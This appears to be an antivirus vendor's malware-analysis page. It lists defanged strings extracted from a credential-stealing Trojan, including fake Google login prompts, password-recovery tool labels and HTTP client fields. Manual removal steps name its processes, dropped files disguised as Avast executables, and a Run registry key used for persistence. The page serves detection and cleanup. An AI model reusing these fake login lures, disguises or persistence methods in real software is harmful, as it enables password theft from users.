<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="NirSoft" type="win32"></assemblyIdentity><description>NirSoft</description><dependency><dependentAssembly><assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency></assembly>
hXXp://VVV.usertrust.com1
3hXXp://crl.usertrust.com/AddTrustExternalCARoot.crl05
hXXp://ocsp.usertrust.com0
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl0t
1hXXp://crt.usertrust.com/UTNAddTrustObject_CA.crt0%
hXXps://secure.comodo.net/CPS0A
0hXXp://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
0hXXp://crt.comodoca.com/COMODOCodeSigningCA2.crt0$
hXXp://ocsp.comodoca.com0
[email protected]
KWindows
UrlMon
0IdHTTPHeaderInfo
 IdTCPServer
IdTCPStream
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
Login
Picture.Data
-gGrgZ9}
Icon.Data
LabelFont.Charset
LabelFont.Color
LabelFont.Height
LabelFont.Name
LabelFont.Style
Lookup.Separator
2.9.1.4
Equipe do Outlook.com
TIdHTTP
ProxyParams.BasicAuthentication
ProxyParams.ProxyPort
Request.ContentLength
Request.ContentRangeEnd
Request.ContentRangeStart
Request.ContentType
Request.Accept
Request.BasicAuthentication
Request.UserAgent
&Mozilla/3.0 (compatible; Indy Library)
VVV.google.com/Please log in to your Gmail account
VVV.google.com:443/Please log in to your Gmail account
VVV.google.com/Please log in to your Google Account
VVV.google.com:443/Please log in to your Google Account
VVV.google.com
dWindowsLive:name=*
abe2869f-9b47-4cd9-a358-c22904dba7f7
82BD0E67-9FEA-4748-8672-D5EFE5B779B0
Copy Password
&HTML Report - All Items
HTML R&eport - Selected Items
HTML Report - All Items
HTML Report - Selected Items
%d items
, %d Selected
Select Eudora.ini filename/Select the location of Thunderbird installation
Loading... %d
KeePass csv file
Eudora.ini file
SMTP
Windows Mail
Windows Live Mail
Server Port
Password Strength
SMTP Server Port
Mail Password Recovery
Mail PassView
This "Portable Network Graphics" image is not supported because either it's width or height exceeds the maximum size, which is 65535 pixels length.
There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.oSome operation could not be performed because the system is out of resources. Close some windows and try again.OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.
SSL status: "%s"
Host field is emptyjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corruptedUThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.
Description: BThe "Portable Network Graphics" image contains an invalid palette.
The file being readed is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corruped, try obtaining it again.nThis "Portable Network Graphics" image is not supported or it might be invalid.
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
.Cannot send or receive after socket is closed.#Too many references, cannot splice.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
DThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
No help keyword specified.
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
8Listbox (%s) style must be virtual in order to set Count"Unable to find a Table of Contents
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Invalid clipboard format Clipboard does not support Icons
Text exceeds memo capacity/Menu '%s' is already being used by another form
Error setting %s.Count
Cannot drag a form"An error returned from DDE ($0%x)/DDE Error - conversation not established ($0%x)0Error occurred when DDE ran out of memory ($0%x)"Unable to connect DDE conversation
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Unsupported clipboard format
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to create key %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Invalid stream format$''%s'' is not a valid component name
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
1.5.4.3
1.0.0.0


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    net1.exe:2028
    net.exe:420
    mscorsvw.exe:1912
    %original file name%.exe:472

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Application Data\EMBUTIR1.exe (105 bytes)
    %Documents and Settings%\%current user%\Application Data\AvastK.exe (16954 bytes)
    %Documents and Settings%\%current user%\Application Data\AvastV.exe (54343 bytes)
    %Documents and Settings%\%current user%\Application Data\mip.dat (38 bytes)
    %Documents and Settings%\%current user%\Application Data\idpc.d (9 bytes)
    %Documents and Settings%\%current user%\Application Data\icone.cur (326 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "DesktopU" = "%Documents and Settings%\%current user%\Application Data\AvastV.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
